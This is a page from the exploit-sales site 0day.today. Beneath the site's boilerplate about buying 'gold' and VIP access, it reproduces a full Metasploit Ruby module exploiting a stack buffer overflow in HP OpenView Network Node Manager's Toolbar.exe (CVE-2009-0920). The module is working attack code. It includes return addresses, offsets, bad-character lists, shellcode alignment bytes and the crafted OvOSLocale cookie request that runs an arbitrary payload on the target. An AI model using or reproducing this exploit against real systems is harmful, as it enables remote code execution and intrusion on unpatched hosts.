0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling BOf
## # $Id: hp_nnm_toolbar_02.rb 13194 2011-07-16 05:21:20Z sinn3r $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.0 and 7.53. By sending a CGI request with a specially OvOSLocale cookie to Toolbar.exe, an attacker may be able to execute arbitrary code. Please note that this module only works against a specific build (ie. NNM 7.53_01195) }, 'License' => MSF_LICENSE, 'Version' => '$Revision: 13194 $', 'Author' => [ 'Oren Isacson', # original discovery 'juan vazquez', # metasploit module (7.0 target) 'sinn3r', # 7.53_01195 target ], 'References' => [ [ 'CVE', '2009-0920' ], [ 'OSVDB', '53242' ], [ 'BID', '34294' ], [ 'URL', 'http://www.coresecurity.com/content/openview-buffer-overflows'] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Privileged' => false, 'Payload' => { 'Space' => 4000, 'BadChars' => "\x01\x02\x03\x04\x05\x06\x07\x08\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x7f\x3b\x2b", 'DisableNops' => true, # no need 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, 'EncoderOptions' => { 'BufferRegister' => 'EDX' } }, 'Platform' => 'win', 'Targets' => [ [ #Windows XP SP3 'HP OpenView Network Node Manager Release B.07.00', { 'Ret' => 0x5A212147, # ovsnmp.dll call esp 'Offset' => 0xFC, # until EIP # Pointer to string with length < 0x100 # Avoid crash before vulnerable function returns # And should work as a "NOP" since it will prepend shellcode #'ReadAddress' => 0x5A03A225,# ov.dll 'ReadAddress' => 0x5A03A225,# ov.dll 'EDXAdjust' => 0x17, # 0x8 => offset until "0x90" nops # 0x4 => "0x90" nops # 0x2 => len(push esp, pop edx) # 0x3 => len(sub) # 0x6 => len(add) } ], [ #Windows Server 2003 'HP OpenView Network Node Manager 7.53 Patch 01195', { 'Eax' => 0x5a456eac, #Readable address for CMP BYTE PTR DS:[EAX],0 'EaxOffset' => 251, #Offset to overwrite EAX 'Ret' => 0x5A23377C, #CALL EDI 'Max' => 8000, #Max buffer size } ] ], 'DisclosureDate' => 'Jan 21 2009')) register_options( [ Opt::RPORT(80) ], self.class ) end def exploit if target.name =~ /7\.53/ #EDX alignment for alphanumeric shellcode #payload is in EDI first. We exchange it with EDX, align EDX, and then #jump to it. align = "\x87\xfa" #xchg edi,edx align << "\x80\xc2\x27" #add dl,0x27 align << "\xff\xe2" #jmp edx #Add the alignment code to payload p = align + payload.encoded sploit = 'en_US' sploit << rand_text_alphanumeric(247) sploit << [target.ret].pack('V*') sploit << rand_text_alphanumeric(target['EaxOffset']-sploit.length+'en_US'.length) sploit << [target['Eax']].pack('V*') sploit << rand_text_alphanumeric(3200) sploit << make_nops(100 - align.length) sploit << align sploit << p sploit << rand_text_alphanumeric(target['Max']-sploit.length) elsif target.name =~ /B\.07\.00/ edx = Rex::Arch::X86::EDX sploit = "en_US" sploit << rand_text_alphanumeric(target['Offset'] - "en_US".length, payload_badchars) sploit << [target.ret].pack('V') sploit << [target['ReadAddress']].pack('V') sploit << "\x90\x90\x90\x90" # Get in EDX a pointer to the shellcode start sploit << "\x54" # push esp sploit << "\x5A" # pop edx sploit << Rex::Arch::X86.sub(-(target['EDXAdjust']), edx, payload_badchars, false, true) sploit << "\x81\xc4\x48\xf4\xff\xff" # add esp, -3000 sploit << payload.encoded end #Send the malicious request to /OvCgi/ToolBar.exe #If the buffer contains a badchar, NNM 7.53 will return a "400 Bad Request". #If the exploit causes ToolBar.exe to crash, NNM returns "error in CGI Application" send_request_raw({ 'uri' => "/OvCgi/Toolbar.exe", 'method' => "GET", 'cookie' => "OvOSLocale=" + sploit + "; OvAcceptLang=en-usa", }, 20) handler disconnect end end =begin NNM B.07.00's badchar set: 00 0D 0A 20 3B 3D 2C 2B NNM 7.53_01195's badchar set: 01 02 03 04 05 06 07 08 0a 0b 0c 0d 0e 0f 10 11 ................ 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f 7f ............... 3b = delimiter 2b = gets converted to 0x2b =end # 0day.today [2024-10-05] #